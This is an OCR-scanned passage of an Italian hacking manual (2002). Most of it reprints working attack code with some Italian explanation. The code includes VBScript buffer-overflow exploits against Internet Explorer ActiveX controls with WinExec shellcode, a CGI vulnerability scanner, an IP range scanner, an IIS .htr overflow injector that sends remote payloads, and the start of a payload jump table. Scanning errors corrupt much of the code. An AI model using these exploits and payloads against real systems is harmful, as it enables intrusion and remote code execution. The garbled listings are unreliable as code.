expstr="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAA" 

expstr = expstr + Chr(235) 'Address in SHELL32, Win98 (7FD035EB) of JMP ESP 
expstr = expstr + Chr(53) 'You may need to use a different address 
expstr = expstr + Chr(208) 
expstr = expstr + Chr(127) 

'NOP for debugging purposes 
expstr = expstr + Chr(144) 

'MOV EDI, ESP 

expstr = expstr + Chr(139) + Chr(252) 

'ADD EDI, 19h (Size of code) 

expstr = expstr + Chr(131) + Chr(199) + Chr(25) 

'PUSH EAX (Window Style EAX = 41 41 41 41 ) 
expstr = expstr + Chr(80) 

'PUSH EDI (Address of command line) 
expstr = expstr + Chr(87) 

'MOV EDX, BFFA0960 (WinExec, Win98) 

expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191) 
'CALL EDX 

expstr = expstr + Chr(255) + Chr(210) 
'XOR EAX, EAX 

expstr = expstr + Chr(51 ) + Chr(1 92) 
'PUSH EAX 

expstr = expstr + Chr(80) 

'MOV EDX, BFF8D4CA (ExitProcess, Win98) 

expstr = expstr + Chr(1 86) + Chr(202) + Chr(21 2) + Chr(248) + Chr(1 91 ) 
'CALL EDX 

expstr = expstr + Chr(255) + Chr(210) 

'Replace with any command + 0 (automatically appended) 
expstr = expstr + "CALC.EXE" 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



'Run exploit 

setupctl.DistUnit = expstr 
setupctl.InstallNow 

— ></script> 



REGWIZC 

<object classid="clsid:50E5E3D1-C07E-1 1 D0-B9FD-00A0249F6B00" id="RegWizObj"> 
</object> 

<script language="VbScript" ><!-- 

msgbox("Registration Wizard Buffer Overrun" + Chr(10) + "Written by Sharie 
Hird") 

expstr = Ti 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAA" 

'We overflowed to the RET point of the stack 

'No NULL's allowed so ret to <JMP ESP> in Shell32 

expstr = expstr & Chr(235) 'Address in SHELL32, Win98 (7FD035EB) of JMP ESP 
expstr = expstr & Chr(53) 'You may need to use a different address 
expstr = expstr & Chr(208) 
expstr = expstr & Chr(127) 



'NOP for debugging purposes 
expstr = expstr + Chr(144) 

'MOV EDI, ESP 

expstr = expstr + Chr(139) + Chr(252) 

'ADD EDI, 19 (Size of code) 

expstr = expstr + Chr(1 31 ) + Chr(1 99) + Chr(25) 

'PUSH EAX (Window Style EAX = 41 41 41 41 ) 
expstr = expstr + Chr(80) 

'PUSH EDI (Address of command line) 
expstr = expstr + Chr(87) 

'MOV EDX, BFFA0960 (WinExec, Win98) 

expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + Chr(191) 
'CALL EDX 

expstr = expstr + Chr(255) + Chr(210) 
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'XOR EAX, EAX 

expstr = expstr + Chr(51 ) + Chr(1 92) 
'PUSH EAX 

expstr = expstr + Chr(80) 

'MOV EDX, BFF8D4CA (ExitProcess, Win98) 

expstr = expstr + Chr(1 86) + Chr(202) + Chr(21 2) + Chr(248) + Chr(1 91 ) 
'CALL EDX 

expstr = expstr + Chr(255) + Chr(210) 

'Replace with any command + 0 (automatically appended) 
expstr = expstr + "CALC.EXE" 

RegWizObj.lnvokeRegWizard(expstr) 

— ></script> 



EYEDOG 

The following code will terminate the browser: 

<object classid="clsid:06A7EC63-4E21 -1 1 D0-A1 1 2-00A0C90543AA" 

id="eye"x/object> 

<script language="vbscript"><!- 

msgbox("EYEDOG OLE Control module Buffer Overrun (Locai Version)" + Chr(10) 
+ "Written by Shane Hird") 

'Padding for the exploit 
expstr = 

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 

'RET address (ExitProcess, BFF8D4CA) 

expstr = expstr + Chr(202) + Chr(212) + Chr(248) + Chr(191) 

'Cali exploitable method (MSInfoLoadFile) 
eye.MSInfoLoadFile(expstr) 

— ></script> 



HHOPEN 

This will, again, terminate the browser: 
<object 

classid="clsid:1 30D7743-5F5A-1 1 D1 -B676-00A0C9697233" 
id="hhopen"x/OBJECT> 
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<script language="vbscript"><!- 

msgboxfhhopen OLE Control Module Buffer Overrun" + Chr(10) + "Written By 
Sharie Hird") 

expstr="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMA 

AAA" 

'Where the RET address appears to be, RET to ExitProcess (BFF8D4CA) 
expstr = expstr + Chr(202) + Chr(212) + Chr(248) + Chr(191) 

'Extra padding to trigger the overrun 
expstr = expstr + 

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 

'Cali exploitable method, note the valid help file 
hhopen.OpenHelp "Winhlp32.hlp", expstr 
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— ></script> 



SETUPBBS 

Again, shuts down the browser: 
<object 

classid="clsid:8F0F5093-0A70-1 1 D0-BCA9-00C04FD85AA6" 
id="setupbbs"x/OBJ ECT> 

<script language="vbscript"><!- 

msgbox("MSN Setup BBS Buffer Overrun" + Chr(10) + "Written by Sharie Hird") 

expstr="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAA" 

'RET address (ExitProcess BFF8D4CA) 

expstr = expstr + Chr(202) + Chr(212) + Chr(248) + Chr(191) 

'This buffer overrun can be triggered by either method. 
'setupbbs.vAddNewsServer expstr, true 
setupbbs.blsNewsServerConfigured expstr 

-></script> 



Test per CGI 

Ecco un sorgente che seve a testare le vulnerabilità relative a CGI 
/* Tested on Slackware linux with kernel 2.0.35 */ 



# include 
^include 
^include 
^include 
^include 
^include 
^include 
^include 
^include 
^include 
^include 
^include 
^include 
^include 
^include 



<fcntl.h> 
<sys/types . h> 
<sys/socket . h> 
<netinet/in . h> 
<signal . h> 
<stdio.h> 
<string. h> 
<netdb . h> 
<ctype . h> 
<arpa/nameser . h> 
<sys/stat . h> 
<strings . h> 
<stdio .h> 
<stdlib.h> 
<unistd.h> 
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^include <sys/socket . h> 



void main (int argc, char *argv[]) 
{ 

int sock, debugm=0; 
struct in_addr addr; 
struct sockaddr_in sin; 
struct hostent *he; 
unsigned long start; 
unsigned long end; 
unsigned long counter; 
char foundmsg[] = "200"; 
char *cgistr; 
char buffer [1024] ; 
int count=0; 
int numin; 
char cgibuff [1024] ; 

char *buff[50] ; /* Don't u think 50 is enought? */ 
char *cginame [50] ; /* Don't u think 50 is enought? */ 



buff[l] = "GET /cgi-bin/phf HTTP/1 . 0\n\n " ; 
buff[2] = "GET /cgi-bin/Count.cgi HTTP/1 . 0\n\n" ; 
buff[3] = "GET /cgi-bin/test-cgi HTTP/1 . 0\n\n" ; 
buff[4] = "GET /cgi-bin/php.cgi HTTP/1 . 0\n\n" ; 
buff[5] = "GET /cgi-bin/handler HTTP/1 . 0\n\n" ; 
buff[6] = "GET /cgi-bin/webgais HTTP/1 . 0\n\n" ; 
buff[7] = "GET /cgi-bin/websendmail HTTP/1 . 0\n\n" ; 
buff[8] = "GET /cgi-bin/webdist.cgi HTTP/1 . 0\n\n" ; 
buff[9] = "GET /cgi-bin/faxsurvey HTTP/1. 0\n\n" ; 
buff[10] = "GET /cgi-bin/htmlscript HTTP/1 . 0\n\n" ; 
buff[ll] = "GET /cgi-bin/pfdispaly.cgi HTTP/1 . 0\n\n" ; 
buff[12] = "GET /cgi-bin/perl.exe HTTP/1 . 0\n\n" ; 
buff[13] = "GET /cgi-bin/wwwboard.pl HTTP/1 . 0\n\n" ; 



cginame [1 ] - 
cginame [2 ] - 
cginame [3 ] - 
cginame [4 ] = 
cginame [5 ] - 
cginame [6] - 
cginame [7] - 
cginame [8] - 
cginame [9] - 
cginame [10] 
cginame [11 ] 
cginame [12] 
cginame [13] 



■■ "phf"; 

■■ "Count . cgi "; 

; "test-cgi"; 

■■ "php.cgi"; 

■ "handler"; 

■■ "webgais "; 

: "websendmail "; 

■■ "webdist . cgi " ; 

■■ "faxsurvey"; 

= "htmlscript"; 

= "pf display"; 

= "peri . exe "; 

= "wwwboard.pl"; 



if (argc<2) 
{ 

printf ("\nusage : %s host " , argv[0] ) ; 

printf("\n Or : %s host -d for debug mode \n\n" , argv [0] ) ; 

exit (0) ; 

} 



if (argc>2) 
{ 

if(strstr ( "-d", argv [2] ) ) 
{ 

debugm=l ; 
} 
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; 

if ( (he=gethostbyname (argv[l] ) ) == NULL) 
{ 

herror ( "gethostbyname ") ; 

exit (0) ; 

} 

printf("\n\n\t\t [CKS & Fdisk] ' s CGI Checker\n\n\n" ) ; 
start=inet_addr (argv[l ]) ; 
counter=ntohl (start) ; 

sock=socket (AF_INET, SOCK_ S TREAM, 0) ; 

bcopy (he->h_addr, (char *) &sin. sin_addr, he->h_length) ; 
sin . sin_family=AF_INET; 
sin . sin_port=htons ( 80) ; 

if (connect (sock, (struct sockaddr*) Ssin, sizeof (sin) ) ! =0) 
{ 

perror ( "connect ") ; 
} 

printf ("\n\n\t [ Press any key to check out the httpd 

version ] \n ") ; 

getchar () ; 

send (sock, "HEAD / HTTP/1 . 0 \n \n ", 17,0) ; 
recvfsock, buffer, sizeof (buffer) , 0) ; 
printf ( "%s ", buffer) ; 
dose (sock) ; 

printf ("\n\t [ Press any key to search 4 CGI stuff ] \n") ; 

getchar () ; 

while (count++ < 13) /* Change 13 to how many buffi?] u have above 
*/ 

{ 

sock=socket (AF_INET, SOCK_ S TREAM, 0) ; 

bcopy (he ->h_addr, (char *) &sin. sin_addr, he->h_length) ; 
sin . sin_family=AF_INET; 
sin . sin__port=htons (80) ; 

if (connect (sock, (struct sockaddr*) & sin, sizeof (sin) )! =0) 
{ 

perror ( "connect ") ; 
} 

printf ("Searching for %s : " , cginame [count] ) ; 

for (numin=0; numin < 1024 ; numin++) 
{ 

cgibuff [numin] = ' \0 ' ; 
ì 

send (sock, buff [count ] , strlen (buff [count ]) ,0) ; 
recvfsock, cgibuff, sizeof (cgibuff ), 0) ; 
cgistr = strstr (cgibuff , foundmsg) ; 
if( cgistr .'= NULL) 

printf ( "Found ! ! ; ) \n ") ; 
else 

printf ("Not Found\n"); 

if ( debugm==l ) 
{ 

printf ("\n\n \n %s \n 

\n ", cgibuff ); 
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printf ("Press any key to continue . . . . \n") ; 

getchar () ; 

} 

dose (sock) ; 




Uno scanner di DOM I N I 0 

Ecco un sempòlice scanner di dominio in grado di eseguire lo scan su un range di IP. 



/********************************** 

* Domain Scanner v2 . 0 * 

* by HoGs HeaD * 

* Fixed up the screwy stuff. * 

* (C)1998 HoGs HeaD * 

* You may not modify and * 

* then redistribute * 

* this source. * 
*********************************/ 



^include <stdio.h> 
^include <sys/socket . h> 
^include <sys/types .h> 
#incl ude <sys/wai t . h> 
^include <netinet/in.h> 
^include <errno.h> 
^include <netdb.h> 
^include <signal . h> 



void brk(int no) { 

printf ( " A C Interrupt ! \n ") ; 
exit (1) ; 

} 



void main (int argc, char **argv) 
{ 

struct hostent *host; /* init stuff */ 

struct sockaddr_in sa; 
int net, error; 
int port=23, i, done=0; 
char *curr_ip, *del, *cm[100] ; 
int Al, A2, A3, A4; 
int Bl, B2, B3, B4; 
int CI, C2, C3, C4; 
printf (" \nDomain Scanner v2 . 0 by HoGs HeaD\nHit any key to 
end. \n") ; 

if(argc < 3) { 

printf ("Usage: domscan ip_begin ip_end port\nwhere ip_start 
equals the 

beginning IP (ie 127 . 26 . 26 . 1) \nand ip_end equals the ending IP (ie 
147 .26.27 .12) \ 

nand port is the port to check on\n\n") ; 
exit (0) ; 

} 



signal (SIGINT, brk) ; 

if(argv[3]==NULL) { 
}else{ 

port=atoi (argv[3] ) ; 
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/* Parse in the first Ip. . . . */ 
curr_ip=argv [ 1 ] ; 

del=(char *) strtok (curr_ip, "."); 
Al=atoi (del) ; 

del= (char *) strtok (NULL, " . ") ; 
A2=atoi (del) ; 

del= (char *) strtok (NULL, " . ") ; 
A3=atoi (del) ; 

del= (char *) strtok (NULL, " . ") ; 
A4=atoi (del) ; 



/* Read in Second Ip. . . */ 
curr_ip = argv[2]; 
del=(char *) strtok (curr_ip, "."); 
Bl=atoi (del) ; 

del= (char *) strtok (NULL, " . ") ; 
B2=atoi (del) ; 

del= (char *) strtok (NULL, " . ") ; 
B3=atoi (del) ; 

del= (char *) strtok (NULL, " . ") ; 
B4=atoi (del) ; 

/* We're finished parsing, now onto the actual scan. . . */ 
C1=A1; 

C2=A2; /* SaVe DeM VaLueS! */ 

C3=A3; 

C4=A4; 



for (A4=C4;A4<=B4 
for (A3=C3;A3<=B3 
for (A2=C2;A2<=C2 
for (Al =C1 ; Al <=B1 



A4++) { 
A3++) { 
A2++) { 
A1++) { 

sprint f(curr_ip, "%d. %d. %d. %d", Al, A2, A3, A4); /* 
build the 
ip */ 

if( ( fork() ) == 0) { /* 
fork a chi 
ld */ 

sa. sin_family = AF_INET; 

sa . sin_addr . s_addr = inet_addr (curr_ip) ; 

sa.sin_port = htons (port) ; /* 
socket is 
set and. . . */ 

net = socket (AF_INET , SOCK_ S TREAM, 0) ; /* 
create socket */ 
if(net < 2) { 
exit (2) ; 

} 

alanti (5) ; /* 
wait 5 sec 

onds until we cancel connection */ 

error = connect(net, (struct sockaddr *)&sa, sizeof sa); /* 
attempt co 
nnection */ 



error < 0 ? printf ( "Error connecting to: %s %s\n", curr_ip, 
strerror (errno) ) : printf ("Connection success at : %s\n", curr_ip) ; 

shut down (net , 2); 
/* disconne 
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exit (0) ; 




/* exit chi 




ld process */ 




} 




} 




ì 




} 




ì 




gets ( (char *)i); 


/* Wait for enter to be pressed to exit */ 
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Buffer Overf low non nello stack 

Siamo sempre sull'argomento dei buffer overflow i quali costituiscono la miniera di metodi 
legati all'hacking. 

Cercare dentro ai programmi i punti in cui i codici non eseguono i controlli è di fatto la 
maggiore risorsa che l'hacker ha a disposizione per cercare di aprire shell all'interno di 
sistemi remoti oppure per elevare i propri privilegi nell'ambito di qualche sistema in cui si 
possiede la possibilità di accedere con permissions basse. 

Come ormai bene saprete i buffer overflow si riferiscono al metdo di inserire all'interno di un 
buffer in cui generalmente un programma inserisce dei dati provenienti dal mondo esterno, 
una quantità di dati talmente elevato da andare a sconfinare in altre zone di memoria ed in 
particolar modo da soprascrivere le locazioni dove generalmente vengono mantenuti 
memorizzati gli indirizzi di ritorno delle funzioni chiamate all'interno dei softwares stessi. 
Questi sistemi cambiano a seconda del sistema operativo in cui sono presenti i programmi 
attaccati anche se poi di fatto alcuni di questi metodi di fatto si legano al metodo di gestione 
dello stack fatto da quasi tutti i sistemi. 

Il discorso legato al metodo usato per la soprascrittura dei dati nello stack lo abbiamo già 
visto in più capitoli. 

A questo punto diventa interessante addentrarci nei metodi di gestione che vengono eseguiti 
da programmi scritti in ambienti come ad esempio quello Windows. 

Nell'ultimo aggiornamento, il file 18, avevamo visto diverse codifiche di moduli per l'apertura 
di shell relativi a diversi sistemi operativi. 

Quando si pensa di aver individuato un buffer overflow il problema diventa quello di essere in 
grado di individuare in quale parte di questo risiede la parte usata per leggere l'instruction 
pointer. 

Vi ricordo che gli indirizzi di ritorno salvato viene poi utilizzato per ripristinare il registro EIP e 
quindi di eseguire un ritorno dalla funzione che era stata chiamata. 

Un piccolo trucco per eseguire questa funzione è quella di utilizzare un pattern identificabile 

quando si esegue l'iniezione del buffer. 

Il seguente modulo software esegue questo metodo : 



// US Injector for NT 

// written by Greg Hoglund <hoglund@ieway . com> 
// http: //www . rootki t . coiti 

// 

// If you would like to deliver a payload, it must be 
// stored in a binary file. 

// This injector decouples the payload from the 
// injection code allowing you to 
// create a numnber of different attack payloads . 
// This code could be used, for 
// example, by a military that needs to attack US 
// servers, and has characterized 

// the eligible hosts. The proper attack can be chosen 
// depending on needs. Since 

// the payload is so large with this injection 

// vector, many options are available. 

// First and foremost, virii can delivered with ease. 

// The payload is also plenty 

// large enough to remotely download and instali a 
// back door program. 

// Considering the monoculture of NT US servers out 
// on the 'Net, this represents a 
// very serious security problem. 

#include <windows.h> 
^include <stdio .h> 
^include <winsock.h> 
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SOCKET s = 0; 
WS AD ATA wsaData; 

if(argc < 2) 

fprintf (stderr, "US Injector for NT \nwritten 
by Greg Hoglund, " \ 

"http: //www. rootklt . com\nUsage : %s <target" 
"ip> «optional payload 

■\n", argv[0]); 
exit (0) ; 

} 



WSAStartup | 



i (MAKEWORD (2,0) , SwsaData) ; 

socket (AF_INET, SOCK_ S TREAM, IPPROTO_TCP) ; 

ZNVALID_SOCKET != s) 

SOCKADDR_ IN anAddr; 
anAddr . sin_family = AF_INET; 
anAddr . sin__port = htons (80) ; 

anAddr . s±n_addr . S_un . S_addr = inet_addr (argv[l] ) ; 

if (0 == connectfs, (struct sockaddr *)SanAddr, 
ìtruct sockaddr) ) ) 
{ 

static char theSploit [4096] ; 
// fili pattern 
char kick = 'z'; //0x7a 
char place = 'A'; 

// my uber sweet pattern gener@tOr 
for(int i=0; i<4096; i+=4) 
{ 

theSploit [i] = kick; 
theSploit [i+1] = place; 
theSploit [i+2] = place + 1; 
theSploit [i+3] = place + 2; 

if(++place == 'Y') // beyond 'XYZ' 
{ 

place = 'A'; 

if( — kick < 'a') kick = 'a'; 

} 



snprintf (theSploit, 5, "get /"); 
snprintf (theSploit + 3005, 22, "BBBB.htr 




// after crash, looks like inetinfo.exe is 
// jumping to the address 
// stored @ location ' GHtG ' (0x47744847) 
// cross reference back to the buffer pattern, 
// looks like we need 

// to store our EIP into theSploit [598] 

// magic eip into NTDLL.DLL 
theSploit [598] = (char)OxFO; 
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theSploit[599] = 
theSplo±t[600] = 
theSploit[601] = 



(char) 0x8C; 
(char) 0xF8; 
(char) 0x77; 



// code I want to execute 
// will jump foward over the 
// embedded eip, taking us 
// directly to the payload 
theSploit[594] 
theSploit[595] 
theSploit[596] 
theSplo±t[597] 



= (char) 0x90; //nop 

= (char)OxEB; //jmp 

= (char) 0x35; // 

= (char) 0x90; //nop 



// the payload. Thls code is executed remoteli 
// if no payload is supplied on stdin, 
// then this default 

// payload is used. int 3 is the debug 
// interrupt and 

// will cause your debugger to "breakpoint " 
// gracefully . 
// upon examiniation you will find that you are 
// sitting 

// directly in this code -payload . 
iffargc < 3) 
{ 



ì 

else 
{ 



theSploit[650] 




(char) 


0x90; 


//nop 




theSploit[651] 




( char) 


0x90; 


//nop 




theSploit[652] 




(char) 


0x90; 


//nop 




theSploit[653] 




(char) 


0x90; 


//nop 




theSploit [654] 




(char) 


OxCC; 


//int 


3 


theSploit [655] 




(char) 


OxCC; 


//int 


3 


theSploit [656] 




(char) 


OxCC; 


//int 


3 


theSploit [657] 




(char) 


OxCC; 


//int 


3 


theSploit [658] 




(char) 


0x90; 


//nop 




theSploit [659] 




( char) 


0x90; 


//nop 




theSploit [660] 




(char) 


0x90; 


//nop 




theSploit [661] 




(char) 


0x90; 


//nop 





// send the user-supplied payload from 
// a file. Yes, that's a 2K buffer for 
// mobile code. Yes, that 's big. 
FILE *in_file; 

in_file = fopen (argv[2] , "rb") ; 
if(in_file) 



< 3000)) 



fgetc (in_file) ; 



int offset = 650; 
while( ( ìfeof (in_file) ) && (off 



{ 



} 



theSploit [off Set++] = 



foiose (in_file) ; 



} 

send(s, theSploit, strlen (theSploit) , 0) ; 



} 

closesocket (s) ; 
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Il concetto di payload è veramente importante i quanto al momento della sua esecuzione 
diventa possibile usare alcuni trucchi per aggiungere delle funzionalità. 
In genere quando si vedono degli exploit scritti per quello che riguarda i buffer overflow si 
vedono codificati in assembler. 

Esiste la metodologia del codice assembler inserito dentro al del codice C/C++ che semplifica 
la vita relativamente alla codifica degli exploit stessi. 

Questa tecnica viene definita di fusione e rispetto alla codifica pura in assembler permette di 
eseguire alcuni trucchetti per quello che riguarda l'iniezione del codice all'interno dello spazio 
legato ad altri processi. 

Quando in genere si parla di buffer overflow ci si riferisce ai concetti di injection vector e di 
payload. 

Il primo è la sequenza di codici operativi che vengono utilizzati per gestire l'instruction pointer 
sulla macchina remota. 

Vi ricorderete che lo scopo del buffer overflow è quello di inserire del codice e di modificare in 
qualche modo il contenuto del registri EIP in modo che l'esecuzione del programma passi 
attraverso il nostro codice. 

Il termine di traduzione di payload sarebbe carico utile o carica esplosiva e di fatto il concetto 
è abbastanza simile per tutti e due i termini. 

Infatti il payload è di fatto il carico da eseguire e quindi paragonabile alla carica esplosiva che 
viene inserita nella macchina remota. 

Come abbiamo visto nei capitoli precedenti questo vettore è legato e quindi dipendente dalla 
macchina e dal tipo di processore. 

Lo scopo quindi del vettore è quello di prelevare il payload da eseguire. 

In altre parole il payload potrebbe essere paragonato ad un virus. 

Il payload può funzionare ovunque, in qualsiasi momento senza essere condizionato dal 

modo con cui questo viene iniettato nella macchina remota. 

Se dovesse capitare che il payload non funzionasse nel modo corretto potrebbe solo 

dipendere dal fatto che questo non è pulito. 

Grazie alla codifica mista C/Assembler è possibile creare dei moduli in grado di creare dei 
paload puliti. 

Il vostro payload non deve esser locato nello stesso punto del vostro vettore d'iniezione 
anche se di fatto comunemente è più semplice usare lo stack per ambedue. 
Quando viene utilizzato lo stack per ambedue si deve prestare attenzione alle dimensioni del 
payload e come il vettore interagisce con questo. 

Se il payload iniziasse prima del vettore dovrete essere sicuri che questi non collidano. 

Se dovessero farlo allora dovreste inserire un JUMP all'interno del payload per fare in modo 

che il tutto salti sopra al vettore d'iniezione e che quindi questo continui dopo. 

Se il tutto dovesse diventare troppo complesso allora converrebbe mettere il payload da 

un'altra parte. 

Qualsiasi programma accetta dell'input dagli utenti e salva questo da qualche parte. 
Qualsiasi posto dove vengono salvati dei dati potrebbe diventare il posto giusto per il payload. 
Il trucco è quello di fare in modo che il processore esegua questo buffer. 
Alcuni punti comuni dove salvare i payload sono : 

File su disco che vengono letti in memoria 
Variabili di evironment controllate dagli utenti locali 
Variabili di evironment passati ad una richiesta WEB 
Campi utente controllati da protocolli di rete 

Dopo aver iniettato il payload lo scopo diventa semplicemente quello di fare in modo che il 
processore vada ad eseguirlo. 

La bellezza di salvare il payload da altre parti che non siano lo stack è quello di liberarsi da 
alcune limitazioni che questo potrebbe avere come ad esempio la dimensione del payload 
stesso. 

Il seguente sorgente descrive il metodo per creare dei metodi di attacco a pauload tramite 
buffer overflow usando il sistema di sviluppo Micrsoft Visual C++. 
Il suo scopo è quello di mantenere il payload e di eventualmente testarli tramite debugger. 
Questo modulo può essere utilizzato per la creazione di exploitbasati su WINDOWS. 
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BUFFERZ.cpp : Defines the entry point for the console //application. 



^include "stdafx.h" 
^include "Windows . h" 
^include "winba.se . h" 
^include "winsock . h" 
^include <stdio.h> 
^include <stdlib.h> 
^include <string.h> 




///////////////////////////////////////////////////////////////////// 
/ These defines and strings are very important and control how the 
payload will load functions dynamically . 



7 



'/ De fine each function you will use as an offset front ebp . 
// After the payload runs, ebp will be pointing to the payload' s 
data segment 

// so these offsets relate to how the jump table is being used. 

y 



//////////////////////////////////////////////////////////////// 

// our jump table for preloaded functions 
// typically this is only LoadLibrary & GetProcAddress . 
// These are the first two addresses in our jump table. 



[ebp] 
[ebp + 



4] 



#define GET_PROC_ADDRESS 
#define LOAD_LIBRARY 

// our jump table for dynamically loaded functions 
// these can be anything we want 



// just 


make sure we don ' t 


overlap 


#define 


GLOBAL_ALLOC 


[ebp 


+ 


8] 


#define 


WRITE_FILE 


[ebp 


+ 


12] 


#define 


SLEEP 


[ebp 


+ 


16] 


#define 


READ_FILE 


[ebp 


+ 


20] 


#define 


PEEK_NAMED_PIPE 


[ebp 


+ 


24] 


#define 


CREATE_PROC 


[ebp 


+ 


28] 


#define 


GET_START_INFO 


[ebp 


+ 


32] 


#define 


CREATE_PIPE 


[ebp 


+ 


36] 


#define 


INTERNE T_ OPEN 


[ebp 


+ 


40] 


#define 


INTERNET_CLOSE_H 


[ebp 


+ 


44] 


#define 


INTERNE T_ OPEN_ URL 


[ebp 


+ 


48] 


#define 


INTERNET_READ_FILE 


[ebp 


+ 52] 


#define 


WSASTARTUP 


[ebp 


+ 


56] 


#define 


_SOCKET 


[ebp 


+ 


60] 


#define 


BIND 


[ebp 


+ 


64] 


#define 


CONNECT 


[ebp 


+ 


70] 


#define 


SEND 


[ebp 


+ 


74] 


#define 


SELECT 


[ebp 


+ 


78] 


#define 


RECV 


[ebp 


+ 


82] 


#define 


URL_PTR 


